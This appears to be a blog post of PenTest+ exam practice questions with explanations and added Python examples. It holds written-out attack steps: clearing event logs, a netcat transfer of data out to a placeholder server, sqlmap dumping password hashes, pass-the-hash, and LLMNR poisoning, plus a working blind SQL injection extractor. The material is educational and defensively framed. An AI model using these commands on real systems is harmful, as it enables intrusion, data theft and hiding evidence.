
[Feb 27, 2025] Pass the PT0-003 CompTIA PenTest+ Exam with Free Practice Questions

The PT0-003 CompTIA PenTest+ exam is the latest certification for professionals who are looking to prove their penetration testing skills and knowledge in network security. As cybersecurity threats continue to evolve, the demand for skilled penetration testers has never been higher. The PT0-003 exam validates your ability to plan, conduct, and analyze penetration tests to evaluate security risks.

To succeed in the PT0-003 exam, it’s crucial to have a strong grasp of penetration testing methodologies, tools, and techniques. This post will give you an overview of the exam objectives, followed by sample practice questions to help you test your knowledge.

Free Practice Questions

To help you assess your readiness for the PT0-003 exam, here are some free practice questions:

1. During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence.

Which of the following is the best way for the penetration tester to hide the activities performed?

A. Clear the Windows event logs.

B. Modify the system time.

C. Alter the log permissions.

D. Reduce the log retention settings.

Answer: A

Explanation:

During a penetration test, one of the critical steps for maintaining access and covering tracks is to clear evidence of the attack. Manipulating data to hide activities on an internal server involves ensuring that logs and traces of the attack are removed. Here’s a detailed explanation of why clearing the Windows event logs is the best method for this scenario:

Understanding Windows Event Logs: Windows event logs are a key forensic artifact that records system, security, and application events. These logs can provide detailed information about user activities, system changes, and potential security incidents.

Why Clear Windows Event Logs:

Comprehensive Coverage: Clearing the event logs removes all recorded events, including login attempts, application errors, and security alerts. This makes it difficult for an investigator to trace back the actions performed by the attacker.

Avoiding Detection: Penetration testers clear event logs to ensure that their presence and activities are not detected by system administrators or security monitoring tools.

Method to Clear Event Logs:

Use the built-in Windows command-line utility wevtutil, from an administrative prompt, to clear logs. For example:

wevtutil cl System
wevtutil cl Security
wevtutil cl Application

These commands clear the System, Security, and Application logs, respectively. Two caveats a tester should know before relying on this: the clear is itself recorded (Windows writes Event ID 1102 to the Security log when it is cleared and Event ID 104 to the System log when any log is cleared, and the command line that did it may already have been captured by Sysmon or a 4688 process-creation event), and any copy already shipped to a SIEM or a Windows Event Forwarding collector is untouched. The local clear therefore hides the past from a casual look at the host, not from a monitored environment. On a real engagement, destroying logs is done only where the rules of engagement explicitly permit it.

Alternative Options and Their Drawbacks:

Modify the System Time: Changing the system time only confuses timestamps on new entries; it is easily detected (Windows records the change as Security Event ID 4616), can be reverted, and erases nothing already logged.

Alter Log Permissions: Changing permissions might stop new entries but does not remove existing ones, and the permission change is itself a suspicious modification an administrator can notice.

Reduce Log Retention Settings: This only limits how much is kept in future; entries already recorded remain, and the configuration change is easy to spot.

Reference: MITRE ATT&CK catalogs this behaviour as T1070.001 (Indicator Removal: Clear Windows Event Logs). Because the clear is itself logged and forwarded copies survive it, defenders treat Event ID 1102 and 104 as high-confidence alerts.

Real-World Scenarios: Attackers clear logs to hinder forensic investigators and incident response teams. Red team engagements and adversary emulations reproduce the step so the client can verify that log forwarding and alerting actually catch it.

In conclusion, of the four options only clearing the Windows event logs removes evidence that is already on the system, which makes it the expected answer. In practice it is a noisy action that should only be taken within the agreed rules of engagement.
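A defender-side check that follows from the caveat above, added here as an example rather than taken from the original post: the event IDs are real Windows IDs, while the JSON-style field names and the five sample records are constructed to stand in for what a SIEM agent exports from the Security and System logs.

```python
"""Detect event-log clearing from a stream of Windows event records.

Added example (not part of the original post). The records below are
constructed to mimic Security/System events as exported to JSON by a
SIEM agent; the field names are an assumption, not a vendor schema.
"""
import re

# Real Windows event IDs: 1102 = Security log cleared, 104 = any log
# cleared (both raised by Microsoft-Windows-Eventlog); 4688 = process
# creation in the Security log; 1 = process creation in Sysmon.
LOG_CLEARED = {("Security", 1102), ("System", 104)}
PROCESS_CREATE = {("Security", 4688), ("Microsoft-Windows-Sysmon/Operational", 1)}

# wevtutil cl <log> / clear-log, and the PowerShell cmdlet that does the same.
CLEAR_CMD = re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\s+|Clear-EventLog\b", re.I)


def classify(event):
    """Return a finding string for a suspicious record, else None."""
    key = (event.get("Channel"), event.get("EventID"))
    if key in LOG_CLEARED:
        return f"log cleared: {event['Channel']} by {event.get('SubjectUserName')}"
    if key in PROCESS_CREATE and CLEAR_CMD.search(event.get("CommandLine", "")):
        return f"log-clear command: {event['CommandLine']!r} by {event.get('SubjectUserName')}"
    return None


def detect(events):
    """All findings, in the order the records arrived."""
    return [f for f in map(classify, events) if f]


SAMPLE_EVENTS = [  # constructed sample records
    {"Channel": "Security", "EventID": 4624, "SubjectUserName": "svc_backup"},
    {"Channel": "Security", "EventID": 4688, "SubjectUserName": "svc_backup",
     "CommandLine": "wevtutil.exe cl Security"},
    {"Channel": "Security", "EventID": 1102, "SubjectUserName": "svc_backup"},
    {"Channel": "System", "EventID": 104, "SubjectUserName": "svc_backup"},
    {"Channel": "System", "EventID": 7036, "SubjectUserName": "SYSTEM"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The process-creation match fires before the clear completes, which is why both signals are worth keeping: the 1102/104 records confirm the clear happened, and the 4688/Sysmon record names the account and command line even when the attacker later clears the System log as well.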

2. A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement.

Given the following firewall policy (rules are evaluated top to bottom, first match wins):

Action | SRC                     | DEST                | Protocol
Block  | 192.168.10.0/24:1-65535 | 10.0.0.0/24:22      | TCP
Allow  | 0.0.0.0/0:1-65535       | 192.168.10.0/24:443 | TCP
Allow  | 192.168.10.0/24:1-65535 | 0.0.0.0/0:443       | TCP
Block  | *                       | *                   | *

Which of the following commands should the tester try next?

A. tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz

B. gzip /path/to/data && cp data.gz <remote_server> 443

C. gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22

D. tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>

Answer: A

Explanation:

Given the firewall policy, let's analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic. The firewall policy rules are:

Block: Traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).

Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).

Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).

Block: All other traffic (*). Because this final rule is a default deny, any connection not explicitly allowed above is dropped, not only the SSH traffic named in the first rule.

Breakdown of Options:

Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz

This command compresses the data into a tar.gz file and uses nc (netcat) to send it to a remote server on port 443, closing after 3 seconds of idle time (-w 3). Since the firewall allows outbound connections from 192.168.10.0/24 to any destination on port 443, this command adheres to the policy and is the correct choice. It assumes a listener is already waiting on <remote_server>:443 (for example nc -l -p 443 > data.tar.gz with traditional netcat), and it sends plain TCP, not TLS: a proxy or IDS that expects a TLS handshake on 443 may flag or reset it, in which case ncat --ssl or an HTTPS upload with curl is the quieter alternative.

Option B: gzip /path/to/data && cp data.gz <remote_server> 443

This command compresses the data but then calls cp with a hostname and a port as if they were paths. cp only copies between local filesystem paths; it cannot open a network connection, so the command fails regardless of the firewall policy.

Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22

nc -nvlk 443 starts a persistent listener (-l listen, -k keep listening) on the local host and never returns, so the cat never runs. Even if it did, the data would go to port 22, which the first rule blocks towards 10.0.0.0/24 and the final rule blocks everywhere else.

Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>

This command uses scp, which rides on SSH and therefore port 22 by default. Outbound 22 is not in either allow rule, so the final block rule drops it. (As written the destination also lacks a colon and path, so scp would treat <remote_server> as a local filename.)

Reference: MITRE ATT&CK T1048 (Exfiltration Over Alternative Protocol) covers moving data out over a port the firewall already permits, which is exactly what option A does. The lesson the question tests is to read the policy first and fit the tool to the allowed path, rather than the other way round.
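To make the first-match reasoning explicit, here is a small evaluator for the policy table, added as an example and not part of the original question: the rules are transcribed from the table, while the tester's address 192.168.10.50, the remote server 203.0.113.10 and the ephemeral source ports are assumptions (option B opens no connection at all, so it is not modelled).

```python
"""First-match evaluation of the firewall policy from question 2.

Added example, not part of the original post. The rule table is
transcribed from the question; the candidate connections are what each
answer option would open, assuming the tester's host sits in
192.168.10.0/24 and <remote_server> is outside it.
"""
import ipaddress


def parse_endpoint(spec):
    """'192.168.10.0/24:1-65535' -> (network, (low, high)); '*' matches anything."""
    if spec == "*":
        return ipaddress.ip_network("0.0.0.0/0"), (1, 65535)
    net, ports = spec.rsplit(":", 1)
    lo, _, hi = ports.partition("-")
    return ipaddress.ip_network(net), (int(lo), int(hi or lo))


POLICY = [  # (action, src, dst, proto) in evaluation order
    ("Block", "192.168.10.0/24:1-65535", "10.0.0.0/24:22", "TCP"),
    ("Allow", "0.0.0.0/0:1-65535", "192.168.10.0/24:443", "TCP"),
    ("Allow", "192.168.10.0/24:1-65535", "0.0.0.0/0:443", "TCP"),
    ("Block", "*", "*", "*"),
]


def evaluate(policy, src_ip, src_port, dst_ip, dst_port, proto):
    """Return the action of the first rule that matches the connection."""
    src, dst = ipaddress.ip_address(src_ip), ipaddress.ip_address(dst_ip)
    for action, s, d, p in policy:
        s_net, (s_lo, s_hi) = parse_endpoint(s)
        d_net, (d_lo, d_hi) = parse_endpoint(d)
        if (p in ("*", proto) and src in s_net and s_lo <= src_port <= s_hi
                and dst in d_net and d_lo <= dst_port <= d_hi):
            return action
    return "Block"  # implicit default deny if nothing matched


# What each option would try to open from the tester's host (constructed
# addresses; nc in A uses 443, nc in C and scp in D use 22).
CANDIDATES = {
    "A: nc <remote> 443": ("192.168.10.50", 51000, "203.0.113.10", 443, "TCP"),
    "C: nc <remote> 22":  ("192.168.10.50", 51001, "203.0.113.10", 22, "TCP"),
    "D: scp (port 22)":   ("192.168.10.50", 51002, "203.0.113.10", 22, "TCP"),
}


def verdicts():
    return {name: evaluate(POLICY, *conn) for name, conn in CANDIDATES.items()}


if __name__ == "__main__":
    for name, verdict in verdicts().items():
        print(f"{verdict:5}  {name}")
```

The evaluator is protocol-aware on purpose: the same nc transfer over UDP (nc -u) would hit the final block rule, because both allow rules are TCP-only.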

3. Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

A. Latches

B. Pins

C. Shackle

D. Plug

Answer: B

Explanation:

In a pin tumbler lock, the key interacts with a series of pins within the lock cylinder. Here’s a detailed breakdown:

Components of a Pin Tumbler Lock:

Key Pins: These are the pins that the key directly interacts with. The cuts on the key align these pins.

Driver Pins: These are pushed by the springs and sit between the key pins and the springs.

Springs: These apply pressure to the driver pins.

Plug: This is the part of the lock that the key is inserted into and turns when the correct key is used.

Cylinder: The housing for the plug and the pins.

Operation:

When the correct key is inserted, the key pins are pushed up by the key’s cuts to align with the shear line (the gap between the plug and the cylinder).

The alignment of the pins at the shear line allows the plug to turn, thereby operating the lock.

Why Pins Are the Correct Answer:

The correct key lifts each pin stack so that the split between key pin and driver pin sits exactly at the shear line, allowing the plug to turn. If any pin is not correctly aligned, the lock will not open.

Illustration in Lock Picking:

Lock picking involves manipulating the pins so they align at the shear line without the key, applying light rotational tension to the plug while each pin is set. This demonstrates the critical role of pins in the functioning of the lock.

4. A penetration tester assesses an application allow list and has limited command-line access on the Windows system.

Which of the following would give the penetration tester information that could aid in continuing the test?

A. mmc.exe

B. icacls.exe

C. nltest.exe

D. rundll.exe

Answer: C

Explanation:

When a penetration tester has limited command-line access on a Windows system protected by an application allow list, the useful tools are the signed Microsoft binaries that are already permitted and that reveal something about the environment. Here's an explanation for each option:

mmc.exe (Microsoft Management Console):

A GUI host for administrative snap-ins. It is not useful for gathering information from a restricted command line, and snap-ins are often blocked separately.

icacls.exe:

Displays and modifies file and folder ACLs. It can show who may write to a given path, which helps later when hunting for writable locations, but it says nothing about the domain or network and is not the best first step.

nltest.exe:

A command-line utility for testing domain trusts and secure-channel status. It ships in System32, is signed by Microsoft and runs as a normal domain user, so it usually passes an allow list. Key functionalities include:

Listing domain controllers: nltest /dclist:<DomainName>

Querying domain trusts: nltest /domain_trusts

Checking the secure channel: nltest /sc_query:<DomainName>

These capabilities give the tester the domain name, the domain controllers and the trust relationships, which is exactly what is needed to plan the next step of an internal test. MITRE ATT&CK lists this kind of enumeration as T1482 (Domain Trust Discovery).

rundll.exe:

On modern Windows the binary is rundll32.exe, which loads a DLL and calls an exported function. It is a well-known execution proxy for getting around allow lists, but it provides no information by itself, and the option as written names a file that does not exist on current systems.

Conclusion: nltest.exe is the best choice among the given options because it provides valuable information about the domain controllers and trust relationships from a restricted shell. This information is crucial for a penetration tester to plan further actions and understand the domain environment.

5. A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client's current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers.

Which of the following actions would the tester most likely take?

A. Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.

B. Perform an internal vulnerability assessment with credentials to review the internal attack surface.

C. Use a generic vulnerability scanner to test the TTPs and review the results with the threat-modeling team.

D. Perform a full internal penetration test to review all the possible exploits that could affect the systems.

Answer: A

Explanation:

BAS (Breach and Attack Simulation) tools are specifically designed to emulate multiple TTPs (Tactics, Techniques, and Procedures) used by adversaries. These tools can simulate various attack vectors in a controlled manner to test the effectiveness of an organization’s security defenses and response mechanisms.

Here’s why option A is the best choice:

Controlled Testing Environment: BAS tools provide a controlled environment where multiple TTPs can be tested without causing unintended damage to the internal systems and servers. This is critical when the threat-modeling team indicates potential impacts on internal systems.

Comprehensive Coverage: BAS tools are designed to cover a wide range of TTPs, allowing the penetration tester to simulate various attack scenarios. This helps in assessing the reactions (alerted, blocked, and others) by the client’s security tools comprehensively.

Feedback and Reporting: These tools provide detailed feedback and reporting on the effectiveness of the security measures in place, including which TTPs were detected, blocked, or went unnoticed. This information is invaluable for the threat-modeling team to understand the current security posture and areas for improvement.

Why the other options fall short: a credentialed vulnerability assessment (B) and a generic scanner (C) look for missing patches and misconfigurations; they do not execute adversary TTPs, so they say nothing about whether the EDR or SIEM alerted or blocked. A full internal penetration test (D) does execute real techniques, but the threat-modeling team has already warned that these TTPs could disrupt internal systems, so running them uncontrolled against production is the wrong risk trade-off.

Conclusion:

Using a BAS tool to test multiple TTPs allows for a thorough and controlled assessment of the client's security tools' effectiveness. BAS platforms typically map each simulated technique to MITRE ATT&CK, which lets the threat-modeling team's input be expressed as a scoped list of techniques to run and gives a like-for-like report of what was detected, blocked, or missed. This approach is systematic, comprehensive, and minimally disruptive, making it the best choice.

6. As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands.

Which of the following techniques would the penetration tester most likely use to access the sensitive data?

A. Logic bomb

B. SQL injection

C. Brute-force attack

D. Cross-site scripting

Answer: B

Explanation:

SQL injection (SQLi) is a technique in which attacker-controlled input is concatenated into a database query so that the input is interpreted as SQL rather than as data. It is one of the most common and effective methods for accessing sensitive data in internal applications that accept unexpected user input.

Here's why option B is the most likely technique:

Arbitrary Command Execution: The question specifies that the internal application accepts unexpected user inputs leading to arbitrary command execution. Of the listed options, SQL injection is the one where that is the mechanism: the injected input becomes SQL statements run by the database. (Strictly, "arbitrary commands" reads more like OS command injection, but that is not among the choices; SQLi reaches the operating system only through database features such as file-write primitives or stored procedures.)

Data Access: SQL injection can be used to extract sensitive data from the database, modify or delete records, and perform administrative operations on the database server. This makes it a powerful technique for accessing sensitive information.

Common Vulnerability: Injection is a well-known and frequently exploited class of web application vulnerability, making it a likely technique that a penetration tester would use to exploit input handling issues in an internal application.

Why not the others: a logic bomb is malicious code planted to trigger later, not a way to read data; a brute-force attack targets credentials, not input handling; cross-site scripting runs script in other users' browsers and does not by itself give access to data stored on the server.

Reference: OWASP Top 10 (A03:2021, Injection) describes the vulnerability class; the usual fix is parameterised queries, so that user input can never change the structure of the statement.

Conclusion:

Given the nature of the vulnerability described (accepting unexpected user inputs leading to arbitrary command execution), SQL injection is the most appropriate and likely technique that the penetration tester would use to access sensitive data. It directly targets the input handling mechanism to manipulate the query, making it the best choice among the options.

7. A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees.

Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

A. Smishing

B. Impersonation

C. Tailgating

D. Whaling

Answer: A

Explanation:

When a penetration tester identifies an exposed corporate directory containing first and last names and phone numbers, the most effective attack technique to pursue would be smishing. Here's why:

Understanding Smishing:

Smishing (SMS phishing) involves sending fraudulent text messages to trick individuals into revealing credentials or performing actions that compromise security. Since the tester has phone numbers, this method is directly applicable; with names and e-mail addresses the equivalent answer would be phishing.

Why Smishing is Effective:

Personalization: Knowing the first and last names allows the attacker to personalize the messages, making them appear more legitimate and increasing the likelihood of the target responding.

Immediate Access: People tend to trust and respond quickly to SMS messages compared to emails, especially if the messages appear urgent or important, and one-time codes for phone-based MFA arrive on the same device, so a convincing message can harvest the second factor as well as the password. On an engagement the landing page is controlled by the tester and messages go only to numbers within the agreed scope.

Alternative Attack Techniques:

Impersonation: Calling or visiting targets while posing as IT or a vendor can work, but it requires real-time interaction and does not scale across many targets.

Tailgating: This physical social engineering technique involves following someone into a restricted area and is not feasible with just names and phone numbers.

Whaling: This targets high-level executives with highly personalized phishing attacks. Although effective, it applies to a narrow set of targets, and the directory does not identify who they are.

8. A penetration tester is compiling the final report for a recently completed engagement. A junior QA team member wants to know where they can find details on the impact, overall security findings, and high-level statements.

Which of the following sections of the report would most likely contain this information?

A. Quality control

B. Methodology

C. Executive summary

D. Risk scoring

Answer: C

Explanation:

In the final report for a penetration test engagement, the section that most likely contains details on the impact, overall security findings, and high-level statements is the executive summary.

Here’s why:

Purpose of the Executive Summary:

It provides a high-level overview of the penetration test findings, including the most critical issues, their impact on the organization, and general recommendations.

It is intended for executive management and other non-technical stakeholders who need to understand the security posture without delving into technical details.

Contents of the Executive Summary:

Impact: Discusses the potential business impact of the findings.

Overall Security Findings: Summarizes the key vulnerabilities identified during the engagement.

High-Level Statements: Provides strategic recommendations and a general assessment of the security posture.

Comparison to Other Sections:

Quality Control: Focuses on the measures taken to ensure the accuracy and quality of the testing process.

Methodology: Details the approach and techniques used during the penetration test.

Risk Scoring: Provides detailed risk assessments and scoring for specific vulnerabilities but does not offer a high-level overview suitable for executives.

9. A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?

A. A generative AI assistant

B. The customer’s designated contact

C. A cybersecurity industry peer

D. A team member

Answer: D

Explanation:

Before sharing a report with a client, it is crucial to have it reviewed to ensure accuracy, clarity, and completeness. The best choice for this review is a team member.

Here's why:

Internal Peer Review:

Familiarity with the Project: A team member who worked on the project or is familiar with the methodologies used can provide a detailed and context-aware review.

Quality Assurance: This review helps catch any errors, omissions, or inconsistencies in the report before it reaches the client. Report contents are client-confidential, so the review also has to stay inside the testing firm, which is the practical reason the other options are wrong.

Alternative Review Options:

A Generative AI Assistant: While useful for drafting and checking for language issues, it may not fully understand the context and technical details of the penetration test.

The Customer’s Designated Contact: Typically, the client reviews the report after the internal review to provide their perspective and request clarifications or additional details.

A Cybersecurity Industry Peer: Although valuable, this option might not be practical due to confidentiality concerns and the peer’s lack of specific context regarding the engagement.

In summary, an internal team member is the most suitable choice for a thorough and contextually accurate review before sharing the report with the client.

10. During an assessment, a penetration tester exploits an SQLi vulnerability.

Which of the following commands would allow the penetration tester to enumerate password hashes?

A. sqlmap -u www.example.com/?id=1 --search -T user

B. sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

C. sqlmap -u www.example.com/?id=1 --tables -D accounts

D. sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

Answer: B

Explanation:

To enumerate password hashes using an SQL injection vulnerability, the penetration tester needs to extract the specific column that holds them. sqlmap's --dump option retrieves the contents of a table, and -D, -T and -C narrow it to a database, a table and a column.

Here's a breakdown of the options:

Option A: sqlmap -u www.example.com/?id=1 --search -T user

--search looks for database objects whose name matches a pattern; with -T it searches for tables named like "user". It locates where data might live but retrieves no rows, so it would not enumerate password hashes.

Option B: sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

This command uses --dump to extract data from the database accounts, table users, column cred. This is the correct option to enumerate password hashes, assuming cred is the column containing them. sqlmap recognises common hash formats in dumped columns and offers to crack them on the spot; for the DBMS's own login hashes (as opposed to application users) the separate --passwords option is used.

Option C: sqlmap -u www.example.com/?id=1 --tables -D accounts

The --tables option lists all tables in the specified database but does not extract data. It is the enumeration step that typically precedes option B.

Option D: sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

--schema prints the database schema, and --current-user and --current-db report which user and database the injected query runs as. All three are reconnaissance and dump no rows.

A practical note: with a blind injection each --dump costs several requests per character, so narrowing the dump with -C keeps both the traffic and the noise in the target's logs down.
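What sqlmap does behind --dump in a boolean-blind case (the technique behind questions 6 and 10), shown end to end as an added example that is neither from the original post nor from sqlmap: the users table with an id/name/cred layout, its two rows (the MD5 and NT hashes of "password", chosen because they are recognisable) and the string-concatenated query are all constructed in an in-memory SQLite database, so it runs offline.

```python
"""Boolean-based blind extraction of the 'cred' column: what sqlmap
automates behind --dump when the page only answers yes or no.

Added example, not from the original post or the sqlmap project. The
users table, its rows and the string-concatenated query are constructed
in an in-memory SQLite database so this runs offline; a real target
differs only in SQL dialect and in the HTTP round trip per query.
"""
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, cred TEXT);
    INSERT INTO users VALUES (1, 'alice', '5f4dcc3b5aa765d61d8327deb882cf99');
    INSERT INTO users VALUES (2, 'bob',   '8846f7eaee8fb117ad06bdd830b7586c');
""")


def vulnerable_lookup(user_input):
    """The application's bug: the raw ?id= value is concatenated into SQL.
    Returns True when a record would be rendered, i.e. the boolean oracle."""
    sql = "SELECT name FROM users WHERE id = " + user_input
    return db.execute(sql).fetchone() is not None


def extract_value(oracle, table, column, row, max_len=64):
    """Recover one cell character by character: binary search over the
    code point of each character, about 7 oracle calls per character."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            # 'id = 1' is a known-good row; the injected AND makes the
            # page's yes/no answer depend on the subquery comparison.
            payload = (f"1 AND (SELECT unicode(substr({column},{pos},1)) "
                       f"FROM {table} ORDER BY id LIMIT 1 OFFSET {row}) >= {mid}")
            if oracle(payload):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:  # past the end: substr() is '' and no comparison is ever true
            break
        out += chr(lo)
    return out


def dump_creds(rows):
    """Equivalent of: sqlmap -u ... --dump -D accounts -T users -C cred"""
    return [extract_value(vulnerable_lookup, "users", "cred", r) for r in range(rows)]


if __name__ == "__main__":
    for cred in dump_creds(2):
        print(cred)
```

Each 32-character hash costs roughly 230 oracle queries here, which is why --dump on a blind injection is slow and why the fix (a parameterised query, so user input never reaches the statement text) matters.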

11. During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine.

Which of the following tools should the penetration tester use to continue the attack?

A. Responder

B. Hydra

C. BloodHound

D. CrackMapExec

Answer: D

Explanation:

When a penetration tester obtains an NTLM hash from a legacy Windows machine, they need a tool that can leverage this hash for further attacks, such as pass-the-hash, or for cracking the hash.

Here’s a breakdown of the options:

Option A: Responder

Responder poisons LLMNR, NBT-NS and mDNS name resolution to capture NetNTLM challenge-response hashes on the wire. It is how hashes are obtained, not a tool for using a hash already in hand.

Option B: Hydra

Hydra is an online login brute-forcer: it guesses passwords against a network service. It does not take a hash as input and is not used for pass-the-hash.

Option C: BloodHound

BloodHound maps Active Directory relationships and identifies attack paths, which is useful for deciding where to go next, but it does not authenticate with NTLM hashes itself.

Option D: CrackMapExec

CrackMapExec authenticates to SMB, WinRM and other services with an NT hash in place of a password (for example crackmapexec smb 192.168.1.0/24 -u administrator -H <nt_hash>), executes commands and dumps further credentials. It is built for exactly this post-exploitation step. (The project has been archived and is continued as NetExec, invoked as nxc, with the same syntax.)

A caveat that matters in practice: pass-the-hash works with the NT hash, the kind dumped from the SAM or NTDS.dit by secretsdump or mimikatz. A NetNTLMv1/v2 value captured by Responder is a challenge-response, not the hash itself; it can be cracked offline or relayed with ntlmrelayx, but it cannot be passed. "Legacy Windows machine" in the question points at a hash dumped from the host. MITRE ATT&CK tracks the technique as T1550.002 (Use Alternate Authentication Material: Pass the Hash).

Conclusion:

Option D, CrackMapExec, is the most suitable tool for continuing the attack using an NTLM hash. It supports pass-the-hash techniques and other operations that leverage NT hashes effectively.

12. A penetration tester needs to collect information over the network for further steps in an internal assessment.

Which of the following would most likely accomplish this goal?

A. ntlmrelayx.py -t 192.168.1.0/24 -1 1234

B. nc -tulpn 1234 192.168.1.2

C. responder.py -I eth0 -wP

D. crackmapexec smb 192.168.1.0/24

Answer: C

Explanation:

To collect information over the network during an internal assessment, the tester needs something that listens to what the hosts on the segment are already saying. Responder does this both passively and actively: it captures broadcast name-resolution requests (which reveal hostnames, share names and the accounts looking for them) and answers them to obtain NetNTLM authentication from the requesting clients.

Here's a breakdown of the options:

Option A: ntlmrelayx.py -t 192.168.1.0/24 -1 1234

ntlmrelayx.py relays captured NTLM authentication to a target; it is a second-stage tool that needs something like Responder in front of it, not a way to collect information on its own (and -t takes a single target; a list of targets goes in -tf).

Option B: nc -tulpn 1234 192.168.1.2

These switches are the netstat/ss flags for listing listening sockets, not a sensible netcat invocation. Even read charitably as a listener on port 1234, nc waits for a single connection and collects nothing about the network.

Option C: responder.py -I eth0 -wP

Responder poisons LLMNR, NBT-NS and mDNS on the interface given by -I. -w starts the rogue WPAD proxy so browsers looking for proxy auto-configuration are served by the tester, and -P forces authentication against that proxy, which yields NetNTLM hashes from clients that would otherwise never authenticate to the tester. This is the option that gathers credentials and host information from the network.

Option D: crackmapexec smb 192.168.1.0/24

CrackMapExec without credentials sweeps the subnet for SMB, printing hostname, OS and signing status for each host, which is legitimate enumeration. It is noisier (one connection to every host) and returns less than Responder in the scenario described, where no credentials are held yet.

Caveats: Responder is disruptive by design; poisoning breaks name resolution for the victims while it runs and will trip modern EDR and honeytoken-style detections (defenders watch for answers to names that should never resolve). Confirm it is within scope before using it, start with analysis mode (-A) to observe without answering, and recommend disabling LLMNR and NBT-NS as the remediation. MITRE ATT&CK: T1557.001 (Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay).
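The protocol exchange Responder exploits, as an added example (not from the original post or from Responder's code): the packet layout follows LLMNR, which reuses the DNS message format over UDP 5355 to multicast 224.0.0.252; the host name fileserv01, the attacker address 192.168.1.66, the transaction ID and the 30-second TTL are constructed.

```python
"""The LLMNR exchange that Responder poisons, built and parsed offline.

Added example, not part of the original post or of Responder. LLMNR
reuses the DNS message format over UDP 5355, multicast to 224.0.0.252;
a Windows host that cannot resolve a name via DNS asks the segment, and
whoever answers first is trusted. All names, addresses and the TTL
below are constructed.
"""
import struct

TYPE_A, CLASS_IN = 1, 1
FLAG_RESPONSE = 0x8000  # QR bit in the flags word


def encode_name(name):
    """'a.b' -> length-prefixed labels ending in a zero byte (no compression)."""
    return b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"


def decode_name(buf, off):
    labels = []
    while buf[off]:
        n = buf[off]
        labels.append(buf[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(labels), off + 1


def build_query(txid, name):
    """Victim -> 224.0.0.252:5355. Header: ID, flags, QD, AN, NS, AR; one A question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def parse_query(pkt):
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if flags & FLAG_RESPONSE or qdcount != 1:
        raise ValueError("not an LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return txid, name, qtype, qclass


def build_poisoned_response(query, attacker_ip, ttl=30):
    """Poisoner -> victim (unicast): same ID so the victim accepts it, QR set,
    the question echoed, and one A record pointing the name at the attacker."""
    txid, name, qtype, qclass = parse_query(query)
    header = struct.pack("!HHHHHH", txid, FLAG_RESPONSE, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", qtype, qclass)
    rdata = bytes(int(octet) for octet in attacker_ip.split("."))
    answer = encode_name(name) + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(pkt):
    """Victim side: what it learns from the first answer that arrives."""
    txid, flags, _, _, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    _, off = decode_name(pkt, 12)
    off += 4                                  # skip the echoed QTYPE/QCLASS
    name, off = decode_name(pkt, off)
    _, _, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    rdata = pkt[off + 10:off + 10 + rdlen]
    return {"id": txid, "is_response": bool(flags & FLAG_RESPONSE),
            "name": name, "ttl": ttl, "ip": ".".join(str(b) for b in rdata)}


def simulate(victim_name="fileserv01", attacker_ip="192.168.1.66", txid=0x1A2B):
    """Both halves of the exchange. The victim then opens SMB to the returned
    address and authenticates, which is where Responder collects the hash."""
    query = build_query(txid, victim_name)
    response = build_poisoned_response(query, attacker_ip)
    return parse_response(response)


if __name__ == "__main__":
    print(simulate())
```

Nothing in the exchange authenticates the answer: the only checks the victim makes are that the transaction ID matches and that the QR bit is set, which is why a mistyped share name on any host in the broadcast domain is enough to hand the tester a NetNTLM hash.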

13. A penetration tester wants to use the following Bash script to identify active servers on a network:

1 network_addr="192.168.1"
2 for h in {1..254}; do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo "Host $h is up"
6 else
7 echo "Host $h is down"
8 fi
9 done

Which of the following should the tester do to modify the script?

A. Change the condition on line 4.

